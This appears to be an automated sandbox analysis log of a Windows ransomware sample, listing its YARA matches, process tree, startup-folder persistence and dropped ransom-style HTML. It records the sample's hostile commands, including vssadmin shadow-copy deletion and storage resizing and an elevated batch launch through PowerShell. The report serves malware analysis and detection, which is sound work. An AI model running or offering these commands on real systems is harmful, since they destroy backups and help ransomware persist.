Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A46196	2_2_00007FFA35A46196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A46F42	2_2_00007FFA35A46F42
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A419A8	2_2_00007FFA35A419A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A41A30	2_2_00007FFA35A41A30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1ECDC0	22_2_00007FF78D1ECDC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D22DDD0	22_2_00007FF78D22DDD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1F6C70	22_2_00007FF78D1F6C70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1EAE40	22_2_00007FF78D1EAE40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1CE6F0	22_2_00007FF78D1CE6F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1A4D3F	22_2_00007FF78D1A4D3F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D206520	22_2_00007FF78D206520
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1C1D70	22_2_00007FF78D1C1D70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1EC5C0	22_2_00007FF78D1EC5C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1C3020	22_2_00007FF78D1C3020
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1D78E0	22_2_00007FF78D1D78E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1C3F50	22_2_00007FF78D1C3F50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1D5720	22_2_00007FF78D1D5720
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1D6F80	22_2_00007FF78D1D6F80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D206A50	22_2_00007FF78D206A50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1CEA30	22_2_00007FF78D1CEA30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D2082B0	22_2_00007FF78D2082B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1CE300	22_2_00007FF78D1CE300
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1FE950	22_2_00007FF78D1FE950
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1FC120	22_2_00007FF78D1FC120
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D209A00	22_2_00007FF78D209A00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D20A9F0	22_2_00007FF78D20A9F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1B2CB0	22_2_00007FF78D1B2CB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1CE510	22_2_00007FF78D1CE510
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1F3B40	22_2_00007FF78D1F3B40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: 22_2_00007FF78D1F2B40	22_2_00007FF78D1F2B40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FFA347F61A6	23_2_00007FFA347F61A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FFA347F6F52	23_2_00007FFA347F6F52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FFA347F0D6D	23_2_00007FFA347F0D6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FFA347F28A3	23_2_00007FFA347F28A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FFA347F26F7	23_2_00007FFA347F26F7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FFA347E0D6D	28_2_00007FFA347E0D6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FFA347E1980	28_2_00007FFA347E1980

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Code function: String function: 00007FF606E75680 appears 38 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Code function: String function: 00007FF78D205680 appears 38 times

Source: IJht2pqbVh.exe, type: SAMPLE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe, type: DROPPED	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 22.2.winstrt10.exe.7ff78d1a0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 0.2.IJht2pqbVh.exe.7ff606e10000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 22.0.winstrt10.exe.7ff78d1a0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 0.0.IJht2pqbVh.exe.7ff606e10000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6

Source: classification engine

Classification label: mal88.rans.adwa.evad.winEXE@44/168@2/3

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606E65960 memset,GetModuleHandleW,FormatMessageW,GetLastError,

0_2_00007FF606E65960

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4660:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyale023.ea2.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'

Source: IJht2pqbVh.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IJht2pqbVh.exe	Virustotal: Detection: 49%
Source: IJht2pqbVh.exe	Metadefender: Detection: 27%
Source: IJht2pqbVh.exe	ReversingLabs: Detection: 62%

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

File read: C:\Users\user\Desktop\IJht2pqbVh.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IJht2pqbVh.exe 'C:\Users\user\Desktop\IJht2pqbVh.exe'
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' get-wmiobject win32_computersystem \| fl model
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\rstrt.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6296 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' get-wmiobject win32_computersystem \| fl model
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' get-wmiobject win32_computersystem \| fl model	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\rstrt.bat''	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6296 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' get-wmiobject win32_computersystem \| fl model	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\vssadmin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: IJht2pqbVh.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: IJht2pqbVh.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: IJht2pqbVh.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas	Jump to behavior

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606E9DDD0 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,strpbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,

0_2_00007FF606E9DDD0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A427B3 push edx; retf	2_2_00007FFA35A427C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A427A3 push edx; retf	2_2_00007FFA35A427B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A44989 pushad ; retf	2_2_00007FFA35A449B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFA35A427C3 push ebx; retf	2_2_00007FFA35A427D2

Persistence and Installation Behavior:

Drops HTML or HTM files to system directories

Show sources

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html

Jump to behavior

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe

Jump to dropped file

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe

Jump to behavior

Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
